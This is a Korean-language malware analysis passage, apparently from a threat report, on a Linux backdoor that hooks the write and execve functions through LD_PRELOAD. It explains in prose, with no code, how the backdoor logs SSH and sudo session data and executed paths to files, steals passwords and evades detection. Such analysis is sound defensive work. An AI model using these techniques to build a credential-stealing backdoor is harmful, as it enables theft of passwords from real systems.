백도어는 읽기 및 쓰기 기능을 연결하여 시스템에서 실행된 프로세스에 의해 기록되는 데이터를 기록합니다. 백도어는 쓰기 호출이 기록되는지 또는 sudo 또는 ssh 세션으로 실행되는 프로세스만 기록되는지 정의하는 sniff_ssh_session 플래그를 확인합니다. 플래그의 기능이 쓰기 함수의 실제 흐름을 반영하지 않는 것으로 보입니다. 플래그가 false로 설정되면 후크된 함수는 프로세스가 sudo로 실행되었는지 또는 호출 프로세스가 ssh인지 확인하고 버퍼를 기록합니다. 원래 쓰기 기능에 전달된 데이터는 MALWARE_FOLDER/sshpass2.txt에 저장됩니다. 그렇지 않으면 플래그가 true로 설정되면 호출 프로세스 이름을 확인하지 않고 버퍼가 MALWARE_FOLDER/sniff.txt에 기록됩니다. 후크 함수가 완료되면 원래 함수 호출의 반환 값을 반환합니다.

execve를 호출하는 bash 및 sh 프로세스의 경우 후크는 새 프로세스로 실행될 파일의 경로를 보유하는 경로 인수를 기록하고 후크된 함수는 타임스탬프와 전체 경로를 추가하고 정보를 MALWARE_FOLDER/execlog에 씁니다.

맬웨어가 기능을 연결하는 것이 일반적이지만 일반적인 기술은 LD_PRELOAD를 사용하여 공유 라이브러리를 로드하는 것입니다. 이는 Symbiote, HiddenWasp 및 기타 위협의 경우였습니다. 이 맬웨어는 XOR 암호화된 문자열을 사용하고 ESET에서 보고한 다른 Linux 백도어와 유사한 암호를 훔칩니다. 그러나 다른 위협과 달리 이 멀웨어는 다양한 명령과 유틸리티에서 정보를 훔쳐 시스템의 특정 파일에 저장합니다. 게다가 데이터를 저장하기 위해 파일을 광범위하게 사용하는데 이는 이전에는 볼 수 없었던 것입니다. 이 맬웨어를 특히 흥미롭게 만드는 것은 피해자 컴퓨터에서 라이브러리의 거의 밀폐된 후킹으로 인해 맬웨어가 정보를 훔치고 SSH 백도어를 설정하면서 지속성을 확보하고 탐지를 회피할 수 있게 합니다.

2.공격 침해지표(IoC) 및 대응

3.출처

https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/